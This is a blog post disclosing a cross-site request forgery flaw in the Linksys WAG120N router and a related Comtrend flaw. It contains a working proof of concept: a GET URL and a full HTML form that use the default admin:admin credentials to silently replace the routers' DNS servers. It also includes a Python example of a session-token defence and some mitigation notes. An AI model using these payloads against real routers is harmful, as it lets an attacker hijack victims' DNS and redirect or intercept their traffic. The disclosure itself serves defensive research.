Sunday, August 23, 2015

Cross site request forgery vulnerability in Linksys WAG120N

In my previous post I described a vulnerability that allows the DNS servers of multiple models of Comtrend routers to be reconfigured simply by clicking a URL like this one:

http://admin:admin@192.168.1.1/dnscfg.cgi?dnsRefresh=1&dnsPrimary=ip_address_malicious_dns_server&dnsSecondary=ip_address_malicious_dns_server2

I am pretty sure that many models from Comtrend and other manufacturers suffer from vulnerabilities of this type. In this post I am going to describe how to attack a Linksys WAG120N router in a similar way.


The Linksys WAG120N won't accept the configuration if it is sent in the URL with the GET method. It is necessary to send the configuration with the POST method, so in this case we need to create an HTML page containing a <form> with the parameters we want to send to the router. We fill in the router's default values and change only the user, the password and the DNS addresses:

<html>
 <head>
 </head>
 <body>
 <form name="setup" method="POST" action="http://admin:admin@192.168.1.1/setup.cgi">
 ...
 ...
 <INPUT type="text" name="PoeUserName" value="admin" maxLength="62" size="26" >
 <INPUT type="password" name="PoePasswd" value="admin" maxLength="43" size="26" >
 ...
 ...
 <input type="hidden" name="c4_static_dns0_" value="1.2.3.4">
 <input type="hidden" name="c4_static_dns1_" value="5.6.7.8">
 <input type="hidden" name="c4_static_dns2_" value="9.10.11.12">
 ...
 ...
 <input type="submit">
 </form>
 </body>
</html>
If a user visits this HTML page, the router configuration is changed as soon as the form is submitted (it could be submitted automatically with JavaScript). In this example the DNS addresses handed out by DHCP are changed, but any setting could be modified the same way. The complete HTML code is at the end of this article.

I am almost sure that other models from different manufacturers can be configured in similar ways. From my point of view, router interfaces should only accept new incoming connections to a welcome page. On that welcome page a session key should be generated and kept while the session is open. This way a user could not go directly to critical configuration menus: for example, he could not jump straight to the menu that configures DNS addresses, because he must pass through the welcome page first, where a session key is generated and assigned, and that key is then validated whenever a critical configuration is about to be changed.
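As an added illustration of the welcome-page session key described above (my own example, not code from the original post or from Linksys), here is a small Python model of an admin interface that issues a per-session token on the welcome page and accepts a POST to setup.cgi only when that token is sent back. The Request/Response classes, the cookie-based session, the trusted origin and the csrf_token field name are assumptions made for the example; the c4_static_dns0_ field name is taken from the form in the article.

```python
import hmac
import re
import secrets
from dataclasses import dataclass, field

# Added example (not from the original post): a toy model of the welcome-page
# session-key scheme. Request/Response, the cookie-based session, the trusted
# origin and the "csrf_token" field name are assumptions for the illustration;
# the c4_static_dns0_ field name is taken from the Linksys form in the article.


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


@dataclass
class Response:
    status: int
    body: str = ""
    set_cookie: dict = field(default_factory=dict)


class AdminInterface:
    """Admin UI that issues a per-session token on the welcome page and refuses
    configuration changes that do not carry it back."""

    TRUSTED_ORIGIN = "http://192.168.1.1"  # assumed LAN address of the router

    def __init__(self):
        self.sessions = {}  # session id -> anti-CSRF token
        self.config = {"c4_static_dns0_": "", "c4_static_dns1_": "", "c4_static_dns2_": ""}

    def handle(self, req):
        if req.method == "GET" and req.path == "/":
            return self.welcome(req)
        if req.method == "POST" and req.path == "/setup.cgi":
            return self.setup(req)
        # Every other entry point is refused: no direct jump into configuration.
        return Response(404, "not found")

    def welcome(self, req):
        sid = secrets.token_urlsafe(16)
        token = secrets.token_urlsafe(32)
        self.sessions[sid] = token
        body = ('<form method="POST" action="/setup.cgi">'
                f'<input type="hidden" name="csrf_token" value="{token}">'
                '<input type="hidden" name="c4_static_dns0_" value="">'
                '<input type="submit"></form>')
        return Response(200, body, set_cookie={"session": sid})

    def setup(self, req):
        expected = self.sessions.get(req.cookies.get("session"))
        submitted = req.form.get("csrf_token", "")
        # A cross-site page can make the browser send the cookie (or embedded
        # credentials), but it cannot read the token out of the welcome page.
        if expected is None or not hmac.compare_digest(expected, submitted):
            return Response(403, "missing or invalid session token")
        # Defence in depth: browsers attach Origin to cross-site form POSTs.
        origin = req.headers.get("Origin")
        if origin is not None and origin != self.TRUSTED_ORIGIN:
            return Response(403, "cross-origin request rejected")
        for key in self.config:
            if key in req.form:
                self.config[key] = req.form[key]
        return Response(200, "saved")


def token_from_page(html):
    """What a real browser session does implicitly: the token lives in the page."""
    m = re.search(r'name="csrf_token" value="([^"]+)"', html)
    return m.group(1) if m else ""


def legitimate_flow(dns="9.9.9.9"):
    """Welcome page first, then a save that carries the issued token."""
    admin = AdminInterface()
    page = admin.handle(Request("GET", "/"))
    sid = page.set_cookie["session"]
    req = Request("POST", "/setup.cgi", cookies={"session": sid},
                  form={"csrf_token": token_from_page(page.body), "c4_static_dns0_": dns},
                  headers={"Origin": AdminInterface.TRUSTED_ORIGIN})
    return admin.handle(req).status, admin.config["c4_static_dns0_"]


def forged_flow(dns="1.2.3.4"):
    """The article's auto-submitted form: the cookie rides along, the token does not."""
    admin = AdminInterface()
    page = admin.handle(Request("GET", "/"))   # victim logged in earlier
    sid = page.set_cookie["session"]
    req = Request("POST", "/setup.cgi", cookies={"session": sid},
                  form={"c4_static_dns0_": dns},  # attacker-chosen DNS server
                  headers={"Origin": "http://attacker.invalid"})  # constructed origin
    return admin.handle(req).status, admin.config["c4_static_dns0_"]


if __name__ == "__main__":
    print("legitimate:", legitimate_flow())  # (200, '9.9.9.9')
    print("forged:    ", forged_flow())      # (403, '')
```

Running the file shows the legitimate flow saving the DNS entry and the cross-site flow being refused with 403 and the configuration untouched. The token check is what defeats the form in this article: a hostile page can make the victim's browser send its session cookie, or the admin:admin credentials embedded in the action URL, but it cannot read the welcome page to learn the token. The Origin comparison is a second line of defence for browsers that send that header on cross-site form posts.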

Mitigation:

Internet Explorer doesn't accept a username and password in the URL of the form action (I mean the syntax http://user:password@domain.com). Currently Chrome and Firefox accept a username and password in the URL. I don't know about other browsers.

Complete HTML:

<html>
 <head>
 </head>
 <body>
 <form name="setup" method="POST" action="http://admin:admin@192.168.1.1/setup.cgi">
 <INPUT type="radio" name="wan_multiplex" value="llc">
 <INPUT type="radio" name="wan_multiplex" value="vc">
 <INPUT type="radio" name="pppoa_multiplex" value="llc">
 <INPUT type="radio" name="pppoa_multiplex" value="vc">
 <INPUT type="text" class="num" maxlength="5" size="5" value="" name="wan_pcr">
 <INPUT type="text" class="num" maxlength="5" size="5" value="" name="wan_scr">
 <INPUT type="radio" name="wan_autodetect" value="enable">
 <INPUT type="radio" name="wan_autodetect" value="disable">
 <INPUT type="text" class="num" maxlength="3" size="5" value="0" name="wan_vpi">
 <INPUT type="text" class="num" maxlength="5" size="5" value="38" name="wan_vci">
 <INPUT type="radio" name="bridged_dhcpenable" value="dhcp">
 <INPUT type="radio" name="bridged_dhcpenable" value="fixedip">
 <INPUT type="text" name="wan_ip_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="PoeUserName" value="admin" maxLength="62" size="26" >
 <INPUT type="password" name="PoePasswd" value="admin" maxLength="43" size="26" >
 <INPUT type="text" name="PoeService" value="" maxLength="43" size="26" >
 <INPUT type="radio" name="pppoeDODC" value="pppoeDODC">
 <INPUT type="text" class="num" name="poeIdleTime" value="5" maxLength="4" size="4" >
 <INPUT type="radio" name="pppoeDODC" value="pppoeKA">
 <INPUT type="text" class="num" name="pppoeRedialTime" value="30" maxLength="3" size="4" >
 <INPUT type="text" name="bpas_ip_1" value="" class="num" maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_2" value="" class="num" maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_3" value="" class="num" maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_4" value="" class="num" maxlength="3" size="3" >
 <INPUT type="text" name="bpaUserName" value="" maxLength="62" size="26" >
 <INPUT type="password" name="bpaPasswd" value="" maxLength="43" size="26" >
 <INPUT type="radio" name="bpaDODC" value="bpaDODC">
 <INPUT type="text" name="bpaIdleTime" value="5" class="num" maxLength="2" size="4" >
 <INPUT type="radio" name="bpaDODC" value="bpaKA">
 <INPUT type="text" name="bpaRedialTime" value="30" class="num" maxLength="3" size="4" >
 <INPUT type="text" name="hostname" value="" maxlength="30" size="26">
 <INPUT type="text" name="domainname" value="" maxlength="62" size="26" >
 <INPUT type="text" name="mtu_size" value="1492" class="num" maxLength="5" size="5" >
 <INPUT type="text" name="lan_ip_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="radio" name="lan_dhcp" value="enable">
 <INPUT type="radio" name="lan_dhcp" value="disable">
 <INPUT type="radio" name="lan_dhcp" value="relay">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_1">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_2">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_3">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_4">
 <INPUT class="ipnum" maxlength="3" size="3" value="100" name="dhcp_start">
 <INPUT type="text" class="num" maxlength="3" size="3" value="50" name="dhcp_num">
 <INPUT type="text" class="num" maxlength="4" size="4" value="0" name="dhcp_lease">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_4">
 <INPUT type="checkbox" name="auto_dls" value="auto_dls">
 <input type="hidden" name="h_ethwan_enable" value="disable">
 <input type="hidden" name="c4_wan_ip_" value="">
 <input type="hidden" name="c4_wan_mask_" value="">
 <input type="hidden" name="c4_wan_gw_" value="">
 <input type="hidden" name="c4_wan_dns1_" value="">
 <input type="hidden" name="c4_wan_dns2_" value="">
 <input type="hidden" name="c4_lan_ip_" value="192.168.1.1">
 <input type="hidden" name="c4_dhcpserver_ip_" value="">
 <input type="hidden" name="c4_static_dns0_" value="1.2.3.4">
 <input type="hidden" name="c4_static_dns1_" value="5.6.7.8">
 <input type="hidden" name="c4_static_dns2_" value="9.10.11.12">
 <input type="hidden" name="c4_wan_wins_" value="">
 <input type="hidden" name="c4_bpas_ip_" value=""> 
 <input type="hidden" name="h_bpaDODC" value="bpaDODC">
 <input type="hidden" name="h_wan_encapmode" value="pppoa">
 <input type="hidden" name="h_wan_multiplex" value="llc">
 <input type="hidden" name="h_pppoa_multiplex" value="llc">
 <input type="hidden" name="h_wan_qostype" value="ubr">
 <input type="hidden" name="h_dsl_mode" value="a">
 <input type="hidden" name="h_wan_autodetect" value="enable">
 <input type="hidden" name="h_bridged_dhcpenable" value="dhcp">
 <input type="hidden" name="h_pppoeDODC" value="pppoeDODC">
 <input type="hidden" name="h_mtu_type" value="auto">
 <input type="hidden" name="h_lan_mask" value="0">
 <input type="hidden" name="h_lan_dhcp" value="enable">
 <input type="hidden" name="h_time_zone" value="+0 2">
 <input type="hidden" name="h_auto_dls" value="disable">
 <input type="hidden" name="PppoeUserName" value="">
 <input type="hidden" name="PppoePasswd" value="">
 <input type="hidden" name="PppoeService" value="">
 <input type="hidden" name="PppoaUserName" value="admin">
 <input type="hidden" name="PppoaPasswd" value="admin">
 <input type="hidden" name="oldip" value="192.168.1.1">
 <input type="hidden" name="h_upgrade_langpkt" value="1">
 <input type="hidden" name="todo" value="save">
 <input type="hidden" name="this_file" value="Setup.htm">
 <input type="hidden" name="next_file" value="Setup.htm">
 <input type="hidden" name="message" value=""> 
 <input type="hidden" name="h_wps_cur_status" value=""> 
 <input type="submit">
 </form>
 </body>
</html>
